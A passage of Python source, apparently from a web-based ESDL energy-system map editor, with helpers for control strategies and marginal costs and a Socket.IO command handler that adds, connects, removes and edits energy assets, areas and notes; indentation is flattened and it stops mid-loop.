cs.name = 'CurtailmentStrategy for ' + asset.name
cs.energyAsset = asset
cs.maxPower = str2float(max_power)
add_control_strategy_for_asset(asset_id, cs)
def get_storage_marginal_costs(asset_id):
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
es = esh.get_energy_system(es_id=active_es_id)
services = es.services
if services:
services_list = services.service
for service in services_list:
if isinstance(service, esdl.StorageStrategy):
if service.energyAsset == asset:
mcc_sv = service.marginalChargeCosts
mdc_sv = service.marginalDischargeCosts
if mcc_sv:
mcc = mcc_sv.value
else:
mcc = 0
if mdc_sv:
mdc = mdc_sv.value
else:
mdc = 0
return mcc, mdc
return 0, 0
def get_curtailment_max_power(asset_id):
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
es = esh.get_energy_system(es_id=active_es_id)
services = es.services
if services:
services_list = services.service
for service in services_list:
if isinstance(service, esdl.CurtailmentStrategy):
if service.energyAsset == asset:
return service.maxPower
return 0
def remove_control_strategy_for_asset(asset_id):
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
cs = asset.controlStrategy
if cs:
cs.delete()
#services_collection = es.services
#if services_collection:
# services = services_collection.service
# for service in services:
# if isinstance(service, esdl.ControlStrategy):
# if service.energyAsset == asset_id:
# services.remove(service)
# ---------------------------------------------------------------------------------------------------------------------
# Marginal Costs
# ---------------------------------------------------------------------------------------------------------------------
def set_marginal_costs_for_asset(asset_id, marginal_costs):
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
asset_name = asset.name
if not asset_name:
asset_name = asset.id
ci = asset.costInformation
if not ci:
ci = esdl.CostInformation()
asset.costInformation = ci
mc = ci.marginalCosts
if not mc:
mc = esdl.SingleValue()
mc.id = str(uuid.uuid4())
mc.name = asset_name + '-MarginalCosts'
ci.marginalCosts = mc
mc.value = marginal_costs
def get_marginal_costs_for_asset(asset_id):
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
ci = asset.costInformation
if ci:
mc = ci.marginalCosts
if mc:
return mc.value
return None
def str2float(string):
try:
f = float(string)
return f
except:
return 0.0
def get_first_last_of_line(line):
first = ()
last = ()
i = 0
for point in line.point:
if i == 0:
first = (point.lat, point.lon)
i+=1
last = (point.lat, point.lon)
return first, last
@executor.job
def call_process_energy_system(esh, filename=None, es_title=None, app_context=None, force_update_es_id=None, zoom=True):
process_energy_system(esh, filename, es_title, app_context, force_update_es_id, zoom)
# ---------------------------------------------------------------------------------------------------------------------
# React on commands from the browser (add, remove, ...)
# ---------------------------------------------------------------------------------------------------------------------
@socketio.on('command', namespace='/esdl')
def process_command(message):
logger.info('received: ' + message['cmd'])
if not valid_session():
send_alert("Session has timed out, please refresh")
return
#logger.debug (message)
#logger.debug (session)
user_email = get_session('user-email')
user_actions_logging.store_logging(user_email, "command", message['cmd'], json.dumps(message), "", {})
active_es_id = get_session('active_es_id')
if active_es_id is None:
send_alert('Serious error: no active es id found. Please report')
return
esh = get_handler()
if esh is None:
logger.error('ERROR finding EnergySystemHandler, Session issue??')
area_bld_list = get_session_for_esid(active_es_id, 'area_bld_list')
es_edit = esh.get_energy_system(es_id=active_es_id)
# test to see if this should be moved down:
# session.modified = True
# logger.debug (get_handler().instance[0].area.name)
if message['cmd'] == 'add_object':
area_bld_id = message['area_bld_id']
asset_id = message['asset_id']
object_type = message['object']
asset_name = message['asset_name']
asset = None
shape = message['shape']
geometry = ESDLGeometry.create_ESDL_geometry(shape)
if object_type == 'Area':
if not isinstance(geometry, esdl.Polygon):
send_alert('Areas with geometries other than polygons are not supported')
else:
if isinstance(geometry, esdl.Polygon):
new_area = esdl.Area(id=asset_id, name=asset_name)
new_area.geometry = geometry
# Update drop down list with areas and buildings
add_area_to_area_bld_list(new_area, area_bld_id, area_bld_list)
emit('area_bld_list', {'es_id': active_es_id, 'area_bld_list': area_bld_list})
# Add area to the indicated area
if not ESDLEnergySystem.add_area_to_area(es_edit, new_area, area_bld_id):
send_alert('Can not add area to building')
# Send new area shapes to the browser
area_list = []
boundary_wgs = ESDLGeometry.create_boundary_from_geometry(geometry)
area_list.append(ESDLGeometry.create_geojson(new_area.id, new_area.name, [], boundary_wgs))
esh.add_object_to_dict(active_es_id, new_area)
emit('geojson', {"layer": "area_layer", "geojson": area_list})
else:
send_alert('Can not add an area with another shap than a Polygon')
else:
edr_asset_str = get_session('adding_edr_assets')
if edr_asset_str:
asset = ESDLAsset.load_asset_from_string(edr_asset_str)
# TODO: deepcopy does not work.
# asset = copy.deepcopy(edr_asset)
# Quick fix: session variable adding_edr_assets now contains ESDL string
class_ = type(asset)
object_type = class_.__name__
print(asset)
# Check if any IDs were 'accidentally' set in EDR model template and replace them by a new unique ID
# If no ID was set, assign no new ID either
for c in asset.eContents:
if c.eClass.findEStructuralFeature('id'):
if c.eGet('id'):
c.eSet('id', str(uuid.uuid4()))
else:
asset_drawing_mode = get_session('asset_drawing_mode')
if asset_drawing_mode == 'asset_from_measures':
asset_from_measure_id = get_session('asset_from_measure_id')
asset = AssetsToBeAdded.get_instance_of_measure_with_asset_id(es_edit, asset_from_measure_id)
atba = AssetsToBeAdded.get_instance()
atba.reduce_ui_asset_count(es_edit, asset_from_measure_id)
class_ = type(asset)
object_type = class_.__name__
else:
module = importlib.import_module('esdl.esdl')
class_ = getattr(module, object_type)
asset = class_()
if issubclass(class_, esdl.Potential):
potential = class_()
potential.id = asset_id
potential.name = asset_name
potential.geometry = geometry
add_to_building = False
if not ESDLAsset.add_object_to_area(es_edit, potential, area_bld_id):
ESDLAsset.add_object_to_building(es_edit, potential, area_bld_id)
add_to_building = True
potentials_to_be_added = []
if isinstance(geometry, esdl.Point):
potentials_to_be_added.append(
['point', 'potential', potential.name, potential.id, type(potential).__name__,
[geometry.lat, geometry.lon]])
elif isinstance(geometry, esdl.Polygon):
coords = ESDLGeometry.parse_esdl_subpolygon(potential.geometry.exterior, False) # [lon, lat]
coords = ESDLGeometry.exchange_coordinates(coords)
potentials_to_be_added.append(
['polygon', 'potential', potential.name, potential.id, type(potential).__name__, coords])
if potentials_to_be_added:
emit('add_esdl_objects', {'es_id': es_edit.id, 'add_to_building': add_to_building,
'asset_pot_list': potentials_to_be_added, 'zoom': False})
esh.add_object_to_dict(active_es_id, potential)
else:
asset.id = asset_id
asset.name = asset_name
asset.geometry = geometry
if isinstance(geometry, esdl.Point):
port_loc = (shape['coordinates']['lat'], shape['coordinates']['lng'])
elif isinstance(geometry, esdl.Polygon):
port_loc = ESDLGeometry.calculate_polygon_center(geometry)
polygon_area = int(shape['polygon_area'])
if not isinstance(asset, esdl.AbstractBuilding):
if asset.surfaceArea:
if asset.power:
asset.power = asset.power * polygon_area / asset.surfaceArea
asset.surfaceArea = polygon_area
else:
asset.surfaceArea = polygon_area
# Set port existence booleans
no_out_port = True
no_in_port = True
if isinstance(asset, esdl.EnergyAsset):
for p in asset.port:
if isinstance(p, esdl.OutPort):
no_out_port = False
if isinstance(p, esdl.InPort):
no_in_port = False
if not isinstance(asset, esdl.AbstractBuilding):
# -------------------------------------------------------------------------------------------------------------
# Add assets with a polyline geometry and an InPort and an OutPort
# -------------------------------------------------------------------------------------------------------------
if object_type in ['ElectricityCable', 'Pipe']:
# Assume pipes and cables never have ports (coming out of the EDR)
inp = esdl.InPort(id=str(uuid.uuid4()), name='In')
asset.port.append(inp)
outp = esdl.OutPort(id=str(uuid.uuid4()), name='Out')
asset.port.append(outp)
asset.length = float(shape['length']) if 'length' in shape else 0.0
print(message)
# automatically connect the conductor to the ports that have been clicked
if 'connect_ports' in message and message['connect_ports'] != '':
connect_ports_msg = message['connect_ports']
start_port = None
end_port = None
from_port1 = None
to_port1 = None
from_port2 = None
to_port2 = None
if 'asset_start_port' in connect_ports_msg:
asset_start_port = connect_ports_msg['asset_start_port']
start_port = esh.get_by_id(active_es_id, asset_start_port)
if 'asset_end_port' in connect_ports_msg:
asset_end_port = connect_ports_msg['asset_end_port']
end_port = esh.get_by_id(active_es_id, asset_end_port)
# cannot connect to same port type
if start_port is not None and end_port is not None and \
type(start_port) == type(end_port):
other_type = esdl.InPort.eClass.name if isinstance(start_port, esdl.OutPort) \
else esdl.OutPort.eClass.name
send_alert(
"Please connect the {} to an {}".format(object_type, other_type))
return
require_reversed = False # to indicate the coordinates of the line need reversal
if start_port is not None:
if isinstance(start_port, esdl.OutPort):
inp.connectedTo.append(start_port)
from_port1 = inp
to_port1 = start_port
elif isinstance(start_port, esdl.InPort):
outp.connectedTo.append(start_port)
from_port1 = outp
to_port1 = start_port
require_reversed = True
if end_port is not None:
if isinstance(end_port, esdl.InPort):
outp.connectedTo.append(end_port)
from_port2 = outp
to_port2 = end_port
elif isinstance(end_port, esdl.OutPort):
inp.connectedTo.append(end_port)
from_port2 = inp
to_port2 = end_port
require_reversed = True
if require_reversed:
line: esdl.Line = asset.geometry # reverse coordinate to change direction of line
point = list(line.point) # copy list
line.point.clear()
for p in point:
line.point.insert(0, p) # reverse list of coordinates
# Send connections
add_to_building = False # TODO: Fix using this inside buildings
conn_list = get_session_for_esid(active_es_id, 'conn_list')
carrier_id = None
if start_port:
if isinstance(start_port, esdl.InPort):
asset1_port_location = asset.geometry.point[-1]
else:
asset1_port_location = asset.geometry.point[0]
if start_port.carrier is not None:
carrier_id = start_port.carrier.id
inp.carrier = start_port.carrier
outp.carrier = start_port.carrier
if end_port is not None and end_port.carrier is None:
# in case of a joint: set the carrier for all ports
if isinstance(end_port.energyasset, esdl.Joint):
for p in end_port.energyasset.port:
p.carrier = start_port.carrier if p.carrier is None else p.carrier
else:
end_port.carrier = start_port.carrier
if end_port:
if isinstance(end_port, esdl.InPort):
asset2_port_location = asset.geometry.point[-1]
else:
asset2_port_location = asset.geometry.point[0]
if end_port.carrier is not None and carrier_id is None: # no start_port carrier
carrier_id = end_port.carrier.id
inp.carrier = end_port.carrier
outp.carrier = end_port.carrier
if start_port is not None and start_port.carrier is None:
# in case of a joint: set the carrier for all ports
if isinstance(start_port.energyasset, esdl.Joint):
for p in start_port.energyasset.port:
p.carrier = end_port.carrier if p.carrier is None else p.carrier
else:
start_port.carrier = end_port.carrier
# send messages to update connections and start port / end port marker colors based on
# the carriers
if start_port:
conn_message = {'from-port-id': from_port1.id,
'from-port-carrier': from_port1.carrier.id if from_port1.carrier else None,
'from-asset-id': from_port1.eContainer().id,
'from-asset-coord': [asset1_port_location.lat, asset1_port_location.lon],
'to-port-id': to_port1.id,
'to-port-carrier': to_port1.carrier.id if to_port1.carrier else None,
'to-asset-id': to_port1.eContainer().id,
'to-asset-coord': [asset1_port_location.lat, asset1_port_location.lon]}
conn_list.append(conn_message)
emit('add_connections', {"es_id": active_es_id, "conn_list": [conn_message]})
# update ports of from_port asset
from_asset = start_port.eContainer()
port_list = []
for p in from_asset.port:
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
'conn_to': [pt.id for pt in p.connectedTo],
'carrier': p.carrier.id if p.carrier else None})
emit('update_asset', {'asset_id': from_asset.id, 'ports': port_list})
if end_port:
conn_message = {'from-port-id': from_port2.id,
'from-port-carrier': from_port2.carrier.id if from_port2.carrier else None,
'from-asset-id': from_port2.eContainer().id,
'from-asset-coord': [asset2_port_location.lat, asset2_port_location.lon],
'to-port-id': to_port2.id,
'to-port-carrier': to_port2.carrier.id if to_port2.carrier else None,
'to-asset-id': to_port2.eContainer().id,
'to-asset-coord': [asset2_port_location.lat, asset2_port_location.lon]}
conn_list.append(conn_message)
emit('add_connections', {"es_id": active_es_id, "conn_list": [conn_message]})
# update ports of from_port asset
to_asset = end_port.eContainer()
port_list = []
for p in to_asset.port:
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
'conn_to': [pt.id for pt in p.connectedTo],
'carrier': p.carrier.id if p.carrier else None})
emit('update_asset', {'asset_id': to_asset.id, 'ports': port_list})
# -------------------------------------------------------------------------------------------------------------
# Add assets with an InPort and two OutPorts (either point or polygon)
# -------------------------------------------------------------------------------------------------------------
elif object_type in ['CHP', 'FuelCell']:
# Assume CHPs and FuelCells never have ports (coming out of the EDR)
inp = esdl.InPort(id=str(uuid.uuid4()), name='In')
asset.port.append(inp)
e_outp = esdl.OutPort(id=str(uuid.uuid4()), name='E Out')
asset.port.append(e_outp)
h_outp = esdl.OutPort(id=str(uuid.uuid4()), name='H Out')
asset.port.append(h_outp)
else:
capability = ESDLAsset.get_asset_capability_type(asset)
# The view mode influences if single or double ports are added
double_line_mode = False
view_modes = ViewModes.get_instance()
if view_modes.get_user_settings(user_email)['mode'] == 'CHESS':
double_line_mode = True
# For producers, consumers (and storage) check if a port already exists (coming from the EDR)
if capability == 'Producer':
if no_out_port:
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='Out'))
if double_line_mode:
if no_in_port:
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='In'))
elif capability in ['Consumer', 'Storage']:
if no_in_port:
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='In'))
if double_line_mode:
if no_out_port:
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='Out'))
elif capability == 'Conversion':
if object_type == "HeatPump" and double_line_mode:
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='PrimIn'))
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='PrimOut'))
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='SecIn'))
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='SecOut'))
else:
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='In'))
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='Out'))
elif capability == 'Transport':
if object_type == 'HeatExchange' or object_type == 'Transformer':
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='PrimIn'))
if double_line_mode:
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='PrimOut'))
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='SecOut'))
if double_line_mode:
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='SecIn'))
else:
asset.port.append(esdl.InPort(id=str(uuid.uuid4()), name='In'))
asset.port.append(esdl.OutPort(id=str(uuid.uuid4()), name='Out'))
else:
logger.error('Unknown asset capability {}'.format(capability))
else:
# Update drop down list with areas and buildings
add_bld_to_area_bld_list(asset, area_bld_id, area_bld_list)
emit('area_bld_list', {'es_id': active_es_id, 'area_bld_list': area_bld_list})
add_to_building = False
if not ESDLAsset.add_object_to_area(es_edit, asset, area_bld_id):
ESDLAsset.add_object_to_building(es_edit, asset, area_bld_id)
add_to_building = True
asset_to_be_added_list = []
buildings_to_be_added_list = []
# TODO: check / solve cable as Point issue?
if not isinstance(asset, esdl.AbstractBuilding):
port_list = []
ports = asset.port
for p in ports:
connTo_ids = list(o.id for o in p.connectedTo)
carrier_id = p.carrier.id if p.carrier else None
port_list.append(
{'name': p.name, 'id': p.id, 'type': type(p).__name__, 'conn_to': connTo_ids,
'carrier': carrier_id})
if isinstance(asset, esdl.AbstractBuilding):
if isinstance(geometry, esdl.Point):
buildings_to_be_added_list.append(['point', asset.name, asset.id, type(asset).__name__,
[shape['coordinates']['lat'], shape['coordinates']['lng']],
False, {}])
elif isinstance(geometry, esdl.Polygon):
coords = ESDLGeometry.parse_esdl_subpolygon(asset.geometry.exterior, False) # [lon, lat]
coords = ESDLGeometry.exchange_coordinates(coords) # --> [lat, lon]
boundary = ESDLGeometry.create_boundary_from_geometry(geometry)
buildings_to_be_added_list.append(['polygon', asset.name, asset.id, type(asset).__name__,
boundary["coordinates"], False, {}])
emit('add_building_objects', {'es_id': es_edit.id, 'building_list': buildings_to_be_added_list,
'zoom': False})
else:
capability_type = ESDLAsset.get_asset_capability_type(asset)
state = asset_state_to_ui(asset)
if isinstance(geometry, esdl.Point):
tooltip_asset_attrs = get_tooltip_asset_attrs(asset, 'marker')
add_spatial_attributes(asset, tooltip_asset_attrs)
asset_to_be_added_list.append(['point', 'asset', asset.name, asset.id, type(asset).__name__,
[shape['coordinates']['lat'], shape['coordinates']['lng']],
tooltip_asset_attrs, state, port_list, capability_type])
elif isinstance(geometry, esdl.Polygon):
coords = ESDLGeometry.parse_esdl_subpolygon(asset.geometry.exterior, False) # [lon, lat]
coords = ESDLGeometry.exchange_coordinates(coords) # --> [lat, lon]
# logger.debug(coords)
tooltip_asset_attrs = get_tooltip_asset_attrs(asset, 'polygon')
add_spatial_attributes(asset, tooltip_asset_attrs)
asset_to_be_added_list.append(
['polygon', 'asset', asset.name, asset.id, type(asset).__name__, coords,
tooltip_asset_attrs, state, port_list, capability_type])
elif isinstance(geometry, esdl.Line):
coords = []
for point in geometry.point:
coords.append([point.lat, point.lon])
tooltip_asset_attrs = get_tooltip_asset_attrs(asset, 'line')
add_spatial_attributes(asset, tooltip_asset_attrs)
asset_to_be_added_list.append(['line', 'asset', asset.name, asset.id, type(asset).__name__,
coords, tooltip_asset_attrs, state, port_list])
#logger.debug(asset_to_be_added_list)
emit('add_esdl_objects', {'es_id': es_edit.id, 'add_to_building': add_to_building,
'asset_pot_list': asset_to_be_added_list, 'zoom': False})
asset_list = get_session_for_esid(es_edit.id, 'asset_list')
for al_asset in asset_to_be_added_list:
asset_list.append(al_asset)
esh.add_object_to_dict(es_edit.id, asset)
if hasattr(asset, 'port'):
for added_port in asset.port:
esh.add_object_to_dict(es_edit.id, added_port)
set_handler(esh)
if message['cmd'] == 'remove_object':
# removes asset or potential from EnergySystem
obj_id = message['id']
if obj_id:
# asset = ESDLAsset.find_asset(es_edit.instance[0].area, obj_id)
# asset can also be any other object in ESDL
asset = esh.get_by_id(active_es_id, obj_id)
if isinstance(asset, esdl.AbstractBuilding):
# Update drop down list with areas and buildings
remove_ab_from_area_bld_list(asset.id, area_bld_list)
emit('area_bld_list', {'es_id': active_es_id, 'area_bld_list': area_bld_list})
if asset:
# Try to remove control strategy for EnergyAssets (and not for buildings)
if isinstance(asset, esdl.EnergyAsset):
remove_control_strategy_for_asset(asset.id)
ESDLAsset.remove_object_from_energysystem(es_edit, obj_id)
esh.remove_object_from_dict(es_edit.id, asset, True)
# remove from asset dict
asset_list = get_session_for_esid(active_es_id, 'asset_list')
asset_list[:] = [a for a in asset_list if a[3] != obj_id] # filter list in place
conn_list = get_session_for_esid(active_es_id, 'conn_list')
conn_list[:] = [c for c in conn_list
if not ((c['from-asset-id'] == obj_id) or (c['to-asset-id'] == obj_id))] # xor: filter list in place
else:
send_alert('Asset or potential without an id cannot be removed')
if message['cmd'] == 'add_note':
id = message['id']
location = message['location']
author = message['author']
note = esdl.Note(id=id, author=author)
dt = parse_date(message['date'])
if dt:
note.date = EDate.from_string(str(dt))
else:
send_alert('Invalid datetime format')
point = esdl.Point(lat=location['lat'], lon=location['lng'])
note.mapLocation = point
esh.add_object_to_dict(es_edit.id, note)
esi = es_edit.energySystemInformation
if not esi:
esi = esdl.EnergySystemInformation(id=str(uuid.uuid4()))
es_edit.energySystemInformation = esi
esh.add_object_to_dict(es_edit.id, esi)
notes = esi.notes
if not notes:
notes = esdl.Notes(id=str(uuid.uuid4()))
esi.notes = notes
esh.add_object_to_dict(es_edit.id, notes)
notes.note.append(note)
esh.add_object_to_dict(es_edit.id, note)
if message['cmd'] == 'remove_area':
area_id = message['id']
if area_id:
top_area = es_edit.instance[0].area
if top_area:
if top_area.id == area_id:
send_alert('Can not remove top level area')
elif not ESDLEnergySystem.remove_area(top_area, area_id):
send_alert('Area could not be removed')
if message['cmd'] == 'get_asset_ports':
asset_id = message['id']
port_list = []
if asset_id:
asset = ESDLAsset.find_asset(es_edit.instance[0].area, asset_id)
ports = asset.port
for p in ports:
port_list.append({'id': p.id, 'type': type(p).__name__})
emit('portlist', port_list)
if message['cmd'] == 'connect_ports':
port1_id = message['port1id']
port2_id = message['port2id']
# still not optimal, but done to get rid of mapping, optimize later
asset_and_coord1 = get_asset_and_coord_from_port_id(esh, active_es_id, port1_id)
asset_and_coord2 = get_asset_and_coord_from_port_id(esh, active_es_id, port2_id)
asset1 = asset_and_coord1['asset']
asset2 = asset_and_coord2['asset']
asset1_port_location = asset_and_coord1['coord']
asset2_port_location = asset_and_coord2['coord']
port1 = None
port2 = None
for p in asset1.port:
if p.id == port1_id:
port1 = p
break
for p in asset2.port:
if p.id == port2_id:
port2 = p
break
if port1 and port2:
# add type check on ports
if type(port1).__name__ == type(port2).__name__:
send_alert('Cannot connect ports of the same type. One should be an InPort and one should be an OutPort')
else:
connect_ports(port1, port2)
add_to_building = False
if asset1.containingBuilding:
asset1_bld_id = asset1.containingBuilding.id
if asset2.containingBuilding:
if asset1.containingBuilding:
# assets both in buildings
if asset1_bld_id == asset2.containingBuilding.id:
# assets in same building
add_to_building = True
else:
# assets in different buildings
bld_asset1 = asset1.containingBuilding
asset1_port_location = (bld_asset1.geometry.lat, bld_asset1.geometry.lon)
bld_asset2 = asset2.containingBuilding
asset2_port_location = (bld_asset2.geometry.lat, bld_asset2.geometry.lon)
add_to_building = False
else:
# asset2 in building and asset1 not in building
bld_asset2 = asset2.containingBuilding
asset2_port_location = (bld_asset2.geometry.lat, bld_asset2.geometry.lon)
add_to_building = False
else:
# asset2 not in building
if asset1.containingBuilding:
# asset1 in building and asset2 not in building
bld_asset1 = asset1.containingBuilding
asset1_port_location = (bld_asset1.geometry.lat, bld_asset1.geometry.lon)
add_to_building = False
else:
# both assets not in building
add_to_building = False
# emit('add_new_conn', {'es_id': es_edit.id, 'add_to_building': add_to_building,
# 'from-port-id': port1_id, 'to-port-id': port2_id,
# 'new_conn': [[asset1_port_location[0], asset1_port_location[1]],
# [asset2_port_location[0], asset2_port_location[1]]]})
# propagate carrier
if not port2.carrier and port1.carrier:
if isinstance(port2.energyasset, esdl.Joint):
for p in port2.energyasset.port: # porpagate carrier in case of a joint
p.carrier = port1.carrier if p.carrier is None else p.carrier
else:
port2.carrier = port1.carrier
elif port2.carrier and not port1.carrier:
if isinstance(port1.energyasset, esdl.Joint):
for p in port1.energyasset.port: # porpagate carrier in case of a joint
p.carrier = port1.carrier if p.carrier is None else p.carrier
else:
port1.carrier = port2.carrier
p1_carr_id = port1.carrier.id if port1.carrier else None
p2_carr_id = port2.carrier.id if port2.carrier else None
conn_list = get_session_for_esid(active_es_id, 'conn_list')
conn_message = {'from-port-id': port1_id, 'from-port-carrier': p1_carr_id, 'from-asset-id': asset1.id,
'from-asset-coord': [asset1_port_location[0], asset1_port_location[1]],
'to-port-id': port2_id, 'to-port-carrier': p2_carr_id, 'to-asset-id': asset2.id,
'to-asset-coord': [asset2_port_location[0], asset2_port_location[1]]}
conn_list.append(conn_message)
emit('add_connections', {"es_id": active_es_id, "conn_list": [conn_message]})
# update ports of assets that are connected
port_list = []
for p in asset1.port:
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
'conn_to': [pt.id for pt in p.connectedTo],
'carrier': p.carrier.id if p.carrier else None})
emit('update_asset', {'asset_id': asset1.id, 'ports': port_list})
port_list = []
for p in asset2.port:
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
'conn_to': [pt.id for pt in p.connectedTo],
'carrier': p.carrier.id if p.carrier else None})
emit('update_asset', {'asset_id': asset2.id, 'ports': port_list})
else:
send_alert('Serious error connecting ports')
if message['cmd'] == 'get_object_info':
object_id = message['id']
asspot = message['asspot']
area = es_edit.instance[0].area
connected_to_info = []
ctrl_strategy = None
if asspot == 'asset':
# asset = ESDLAsset.find_asset(area, object_id)
asset = esh.get_by_id(es_edit.id, object_id)
logger.debug('Get info for asset ' + asset.id)
attrs_sorted = ESDLEcore.get_asset_attributes(asset, esdl_doc)
name = asset.name
if isinstance(asset, esdl.EnergyAsset):
connected_to_info = get_connected_to_info(asset)
if asset.controlStrategy:
ctrl_strategy = asset.controlStrategy.name
else:
ctrl_strategy = None
asset_class = 'EnergyAsset'
else:
asset_class = 'AbstractBuilding'
asset_doc = asset.__doc__
else:
pot = esh.get_by_id(es_edit.id, object_id)
logger.debug('Get info for potential ' + pot.id)
attrs_sorted = ESDLEcore.get_asset_attributes(pot, esdl_doc)
name = pot.name
connected_to_info = []
ctrl_strategy = None
asset_doc = pot.__doc__
if name is None: name = ''
emit('asset_info', {'id': object_id, 'name': name, 'class': asset_class, 'attrs': attrs_sorted, 'connected_to_info': connected_to_info, 'ctrl_strategy': ctrl_strategy, 'asset_doc': asset_doc})
if message['cmd'] == 'get_conductor_info':
asset_id = message['id']
latlng = message['latlng']
area = es_edit.instance[0].area
asset = ESDLAsset.find_asset(area, asset_id)
connected_to_info = get_connected_to_info(asset)
logger.debug('Get info for conductor ' + asset.id)
attrs_sorted = ESDLEcore.get_asset_attributes(asset, esdl_doc)
name = asset.name
if name is None: name = ''
asset_doc = asset.__doc__
emit('asset_info', {'id': asset_id, 'name': name, 'class': 'EnergyAsset', 'latlng': latlng, 'attrs': attrs_sorted, 'connected_to_info': connected_to_info, 'asset_doc': asset_doc})
if message['cmd'] == 'get_table_editor_info':
producer_info_list = []
consumer_info_list = []
transport_info_list = []
storage_info_list = []
conversion_info_list = []
energy_assets = esh.get_all_instances_of_type(esdl.EnergyAsset, active_es_id)
for asset in energy_assets:
attrs_sorted = ESDLEcore.get_asset_attributes(asset, esdl_doc)
connected_to_info = get_connected_to_info(asset)
strategy_info = get_control_strategy_info(asset)
profile_info = get_port_profile_info(asset)
mc_info = None
ci = asset.costInformation
if ci:
mc = ci.marginalCosts
if mc:
mc_info = mc.value
name = asset.name
if name is None: name = ''
asset_doc = asset.__doc__
asset_type = type(asset).__name__
asset_info = {
'id': asset.id,
'name': name,
'type': asset_type,
'attrs': attrs_sorted,
'connected_to_info': connected_to_info,
'control_strategy': strategy_info,
'marginal_costs': mc_info,
'profile_info': profile_info,
'asset_doc': asset_doc
}
if isinstance(asset, esdl.Producer):
producer_info_list.append(asset_info)
if isinstance(asset, esdl.Consumer):
consumer_info_list.append(asset_info)
if isinstance(asset, esdl.Transport):
transport_info_list.append(asset_info)
if isinstance(asset, esdl.Storage):
storage_info_list.append(asset_info)
if isinstance(asset, esdl.Conversion):
if not strategy_info:
logger.debug("================== NO CONTROL STRATEGY ===================")
conversion_info_list.append(asset_info)
# Sort arrays on asset_type
# attrs_sorted = sorted(attributes, key=lambda a: a['name'])
producer_info_list = sorted(producer_info_list, key=lambda a: (a['type'], a['name']))
consumer_info_list = sorted(consumer_info_list, key=lambda a: (a['type'], a['name']))
transport_info_list = sorted(transport_info_list, key=lambda a: (a['type'], a['name']))
storage_info_list = sorted(storage_info_list, key=lambda a: (a['type'], a['name']))
conversion_info_list = sorted(conversion_info_list, key=lambda a: (a['type'], a['name']))
emit('table_editor', {
'producer': producer_info_list,
'consumer': consumer_info_list,
'transport': transport_info_list,
'storage': storage_info_list,
'conversion': conversion_info_list
})
if message['cmd'] == 'set_asset_param':
if 'id' not in message or message['id'] is None:
fragment = message['fragment']
asset_id = None
else:
fragment = None
asset_id = message['id']
param_name = message['param_name']
param_value = message['param_value']
if asset_id is None:
resource = esh.get_resource(active_es_id)
assets = [resource.resolve(fragment)]
else:
if isinstance(asset_id, list):
assets = []
for ass_id in asset_id:
assets.append(esh.get_by_id(active_es_id, ass_id))
else:
assets = [esh.get_by_id(active_es_id, asset_id)]
for asset in assets:
logger.debug('Set param '+ param_name + ' for class ' + asset.eClass.name + ' to value '+ str(param_value))
try:
attribute = asset.eClass.findEStructuralFeature(param_name)
if attribute is not None:
if attribute.many:
#length = len(param_value)
eCollection = asset.eGet(param_name)
eCollection.clear() # TODO no support for multi-select of enums
print('after clear', eCollection)
if not isinstance(param_value, list):
param_value = [param_value]
for item in param_value:
parsed_value = attribute.eType.from_string(item)
eCollection.append(parsed_value)
else:
if param_value == "" or param_value is None:
parsed_value = attribute.eType.default_value
else:
parsed_value = attribute.eType.from_string(param_value)
if attribute.name == 'id':
esh.remove_object_from_dict(active_es_id, asset)
asset.eSet(param_name, parsed_value)
esh.add_object_to_dict(active_es_id, asset)
else:
asset.eSet(param_name, parsed_value)
else:
send_alert('Error setting attribute {} of {} to {}, unknown attribute'.format(param_name, asset.name, param_value))
except Exception as e:
logger.error('Error setting attribute {} of {} to {}, caused by {}'.format(param_name, asset.name, param_value, str(e)))
send_alert('Error setting attribute {} of {} to {}, caused by {}'.format(param_name, asset.name, param_value, str(e)))
traceback.print_exc()
# update gui, only if necessary for EnergyAssets, and Ports
# and EnergySystem ans
# update_gui = False
# update_asset = asset
# if isinstance(asset, esdl.EnergySystem):
# #emit()
# # todo find out how to update energy system name and update Area name in dropdown
# pass
# elif isinstance(asset, esdl.EnergyAsset):
# if param_name == esdl.EnergyAsset.name.name:
# update_gui = True
# if param_name == esdl.EnergyAsset.state.name:
# update_gui = True
# elif isinstance(asset, esdl.Port):
# update_gui = True
# update_asset = asset.energyasset
#
# if update_gui:
# emit('delete_esdl_object', {'asset_id': update_asset.id})
# asset_ui, conn_list = energy_asset_to_ui(esh, active_es_id, update_asset)
# emit("add_esdl_objects",
# {
# "es_id": active_es_id,
# "asset_pot_list": [asset_ui],
# "zoom": False,
# })
# emit("add_connections",{"es_id": active_es_id, "conn_list": conn_list})
if message['cmd'] == 'set_area_bld_polygon':
area_bld_id = message['area_bld_id']
polygon_data = message['polygon']
polygon = esdl.Polygon()
exterior = esdl.SubPolygon()
polygon.exterior = exterior
i = 0
prev_lat = 0
prev_lng = 0
while i < len(polygon_data[0]):
coord = polygon_data[0][i]
if i == 0:
first = (coord['lat'], coord['lng'])
if i == len(polygon_data) - 1:
last = (coord['lat'], coord['lng'])
# Don't understand why, but sometimes coordinates come in twice
if prev_lat != coord['lat'] or prev_lng != coord['lng']:
